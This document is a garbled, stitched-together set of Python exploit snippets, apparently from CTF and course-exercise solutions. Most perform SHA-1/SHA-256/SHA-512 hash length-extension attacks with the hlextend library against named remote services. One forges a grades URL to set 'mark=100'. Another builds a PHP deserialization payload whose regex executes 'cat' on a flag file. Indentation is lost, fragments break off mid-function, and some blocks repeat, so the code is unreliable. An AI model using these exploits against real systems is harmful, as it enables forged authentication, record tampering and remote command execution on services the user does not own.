def breakitman(num):
conn = remote('140.112.31.109', 10003)
time.sleep(5)
conn.sendline("admin||2||" + checkIntegrity("admin||2"))
conn.recvuntil('string to me: ')
mac = conn.recvline()
conn2 = remote('140.112.31.109', 10003)
time.sleep(5)
conn2.sendline("admin||" + mac.split("||")[0] + "||" +
checkIntegrity("admin||" + mac.split("||")[0]))
conn2.recvuntil('string to me: ')
payload = base64.b64decode(conn2.recvline().split('||')[1]).encode("hex")
origin_mess = "admin" + "||" + mac.split("||")[0] + "||login"
GG = hlextend.new('sha256')
padding = GG.extend("||printflag", origin_mess, num, payload, raw=True)
conn.sendline(
base64.b64encode(padding) + "||" +
base64.b64encode(GG.hexdigest().decode("hex")))
conn2.close()
conn.recvline()
if "error" in conn.recvline():
conn.close()
return False
else:
print num
print conn.recvline()
conn.close()
exit()
return True
def attack(url):
#parameter url is the attack url you construct
#RETURNS - ParseResult(scheme='http', netloc='grades.seclab.space', path='/', params='', query='tag=sha256_hash&sid=student_id', fragment='')
parsed = urlparse(url)
#create a connection to server
httpconn1 = http.client.HTTPConnection(parsed.hostname, parsed.port)
#RETURNS - {'tag': ['sha256_hash'], 'sid': ['student_id']}
params_dict = parse_qs(parsed.query)
#tag = params_dict['tag'][0]
sid = params_dict['sid'][0]
#send a GET request to get tag for current student id
httpconn1.request("GET", parsed.path + "/tag.php?sid=" + sid)
# httpresp is response object containing a status value and possible message
httpresp1 = httpconn1.getresponse()
if (httpresp1.status == 200):
tag = httpresp1.read().decode()
for i in range(8, 21):
#create a connection to server
httpconn2 = http.client.HTTPConnection(parsed.hostname, parsed.port)
message = "sid=" + sid
#need to encode to bytes
extension = "&sid=" + sid + "&mark=100"
sha2 = hlextend.new('sha256')
sha2.set_state(tag)
sha2.update(extension.encode())
padding = quote(sha2.padding(i + len(message)))
hex_version = sha2.hexdigest()
attack_tag = hex_version + "&" + message + padding + extension
# issue server-API request
httpconn2.request("GET", parsed.path + "?tag=" + attack_tag)
# httpresp is response object containing a status value and possible message
httpresp2 = httpconn2.getresponse()
if (httpresp2.status == 200):
# return the url that made the attack successul
return parsed.scheme + "://" + parsed.netloc + parsed.path + "?tag=" + attack_tag
def forgeIllegalPayload(hmac, extension, keyLength):
'''
In this function, you are not to use the secret key shared between alice and bob
However, you might know the length of the secret key (keyLength)
(bytes, bytes, integer) -> bytes
'''
#initialize new hash
sha2 = hlextend.new('sha256')
#parse hmac to get token and message based on definition
token = hmac[:64]
message = hmac[64:]
sha2.set_state(token)
sha2.update(extension)
padding = sha2.padding(keyLength + len(message))
return sha2.hexdigest().encode() + message + padding + extension
def sice():
new = "http://crypto.chal.csaw.io:5003/new"
view = "http://crypto.chal.csaw.io:5003/view"
data = {"author": "a", "note" : "a"}
r = requests.post(new, data = data)
print(r.text)
hashes = []
for k in range(1, 200):
sha = hlextend.new("sha1")
data = sha.extend('&admin=True&access_sensitive=True&entrynum=7', 'admin=False&access_sensitive=False&author=a¬e=a&entrynum=783', k,
'9cd6a40678d84d3c407ef7f23ee21e8c65c8d4b2')
forged = sha.hexdigest()
sice = {"id": e(data), "integrity": forged}
r2 = requests.post(view, data = sice)
print(r2.text)
import hlextend
import urllib
exploit = """
O:4:"Post":3:{s:8:"\x00*\x00title";s:4:"Test";s:7:"\x00*\x00text";s:5:"stuff";s:10:"\x00*\x00filters";a:1:{i:0;O:6:"Filter":2:{s:10:"\x00*\x00pattern";s:8:"/^(.*)/e";s:7:"\x00*\x00repl";s:29:"`cat /home/daedalus/flag.txt`";}}}
"""
sha = hlextend.new('sha1')
data = sha.extend(exploit, 'b:1;', 8,
'2141b332222df459fd212440824a35e63d37ef69')
print 'custom_settings: ' + urllib.quote_plus(data.replace('\\x', '%'))
print 'custom_settings_hash: ' + sha.hexdigest()
$post = new Post($title, $text, $filter);
$post_ser = serialize($post);
$ser = $post_ser;
echo $ser;
?>
""".format(flag_file)
with open('phpscript.php', 'w') as f:
f.write(php_script)
php_output = subprocess.check_output('php phpscript.php', shell=True, stderr=subprocess.STDOUT)
php_output = php_output.split('<')[0].split('\n')[1]
original_hash = '2141b332222df459fd212440824a35e63d37ef69'
original_data = 'b:1;'
# '\x0a' is our new line delimiter
appended_data = '\x0a' + php_output
key_length = 8
sha = hlextend.new('sha1')
cookie = sha.extend(appended_data, original_data, key_length, original_hash)
cookie_hash = sha.hexdigest()
output = php_urlencode(cookie)
cookies = {'custom_settings_hash': cookie_hash,
'custom_settings': output}
results = requests.get(url, cookies=cookies).text
print [line for line in results.split('\n') if 'yay_flag' in line]
global game
game.sendlineafter('3. Exit\n', '1') # option 1: New Game
game.sendlineafter('3. Get proof and quit\n', '3') # option 3: Get proof and quit
return game.recvuntil('\n').strip()
# with payload being the supposedly score and proof being the sha512 sum
def claim_prize(payload, proof):
global game
game.sendlineafter('3. Exit\n', '2') # option 2: Claim prize
game.sendlineafter('Input the number you reached: \n', payload) # input the score reached ^^
game.sendlineafter('Present the proof of your achievement: \n', proof) # input the proof ^^
answer = game.recvline()
print answer
# If it starts with that string, it means that we're wrong in the length
return not answer.startswith("Don't play games with me")
if __name__ == '__main__':
game = remote(host, port)
for key_len in length_range:
print "\n[+] Trying key length:", key_len
h = hlextend.new('sha512')
# the extend function returns the `known_data + padding + append`
# which will be our payload
payload = h.extend(append, known_data, key_len, signature)
# for some reason '\x80' and '\x00' are escaped...
payload = payload.replace('\\x00', '\x00').replace('\\x80', '\x80')
proof = h.hexdigest()
if claim_prize(payload, proof):
break
import signal
import sys
import os
import time
import base64
import random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
origin_text = "gjme123"
sha256 = SHA256.new()
sha256.update(origin_text)
print "origin ", sha256.digest().encode('hex')
k = hlextend.new('sha256')
k.hash(origin_text)
print "hlextend ver", k.hexdigest()
GG = hlextend.new('sha256')
padding = GG.extend('gg', 'jme123', 1, k.hexdigest(), raw=True)
for i in padding:
print i
"""
print "GG", GG.hexdigest()
sha256 = SHA256.new()
ans = ""
i =0
print "g"+padding
while i < len(padding):
reference = [
'abc', 'The quick brown fox jumped over the lazy dog',
'The quick brown fox jumped over the lazy dog.',
"abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
urandom(30)
]
# comparitive hash generation test with hashlib, check basic hash generation functionality
for alg in algorithms:
for a in range(0, 256):
string = 'A' * a
h = hashlib.new(alg)
h.update(string)
test1 = h.hexdigest()
s = hlextend.new(alg)
s.hash(string)
test2 = s.hexdigest()
if not test1 == test2:
print alg + ' no match for string of length ' + str(a)
print 'Hashlib: ' + test1
print 'Hlextend: ' + test2
raise TerminateTest('Verification failure')
# check reference hash values
for alg in algorithms:
for ref in reference:
s = hlextend.new(alg)
s.hash(ref)
h = hashlib.new(alg)
h.update(ref)
def extend(data, size):
import hlextend
hsh = sha1(data).hexdigest()
sha = hlextend.new('sha1')
return sha.extend(data, 'A' * 1000, 0, hsh)
#!/usr/bin/python
import hlextend
import urllib
import requests
ext_attack = hlextend.new('sha1')
type = 'americano'
t = '/brew.php?type=' + type
expand_query = ext_attack.extend(
'&type=espresso', t, 15,
'5e3ece3a886d5ff19ca157b9f79180f8759f524b').replace('\\x', '%')
print expand_query + "\n" + ext_attack.hexdigest() + "\n"
url = "http://web.lasactf.com:14339"
query = expand_query + "&auth=" + ext_attack.hexdigest()
url = url + query
resp = requests.get(url)
print resp.text
import hlextend
import base64, pwn
host = "challenge01.root-me.org"
port = 51022
s = pwn.remote(host, port)
print s.recv()
s.sendline('1')
print s.recv()
sha = hlextend.new('sha256')
re = sha.extend(
'fsfsfdsfs:admin',
'a:guest',
16,
'6ac698be1cfd53cd71b42d91b73fa79d2d2676daf775c2c719b4a912e2e58b9d',
raw=True)
print re
tr = base64.b64encode(re)
tok2 = base64.b64encode(sha.hexdigest())
token = tr + ':' + tok2
s.sendline(token)
print s.recv()
#####################################################
# Welcome back! Flag to validate is u$3_HMAC_l4m3rZ! #
#####################################################
import hlextend
import requests
import hashlib
macAuth = 'http://ec2-35-159-11-170.eu-central-1.compute.amazonaws.com/mac/trythis';
knownMessage = 'Guys who understand that using Hash function as Mac is one very bad practice: Thai Duong; Juliano Rizzo; Flickr (the hard way);';
key = 'awG3342efsdf';
keyLenght = len(key);
myName = 'EvgeniyKamensky';
serverSha = sha1(key + knownMessage);
clientSha = hlextend.new('sha1')
message = clientSha.extend(myName, knownMessage, keyLenght, serverSha, raw=True);
clientShaMAC = clientSha.hexdigest()
nextServerSha = sha1(key + message);
print(serverSha);
print(clientShaMAC);
print(nextServerSha);
Работает, только нужно использовать 'чистый' sha1 я взял отсюда https://codereview.stackexchange.com/questions/37648/python-implementation-of-sha1
import hlextend
import requests
#!/usr/bin/python
import hlextend
import urllib
import requests
ext_attack = hlextend.new('sha1')
type = 'americano';
t = '/brew.php?type='+type;
expand_query = ext_attack.extend('&type=espresso', t, 15, '5e3ece3a886d5ff19ca157b9f79180f8759f524b').replace('\\x', '%')
print expand_query + "\n" + ext_attack.hexdigest() + "\n"
url = "http://web.lasactf.com:14339";
query = expand_query + "&auth="+ ext_attack.hexdigest();
url = url + query;
resp = requests.get(url);
print resp.text;
reference = [ 'abc',
'The quick brown fox jumped over the lazy dog',
'The quick brown fox jumped over the lazy dog.',
"abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
urandom(30)]
# comparitive hash generation test with hashlib, check basic hash generation functionality
for alg in algorithms:
for a in range(0,256):
string = 'A'*a
h = hashlib.new(alg)
h.update(string)
test1 = h.hexdigest()
s = hlextend.new(alg)
s.hash(string)
test2 = s.hexdigest()
if not test1 == test2:
print alg + ' no match for string of length ' + str(a)
print 'Hashlib: ' + test1
print 'Hlextend: ' + test2
raise TerminateTest('Verification failure')
# check reference hash values
for alg in algorithms:
for ref in reference:
s = hlextend.new(alg)
s.hash(ref)
h = hashlib.new(alg)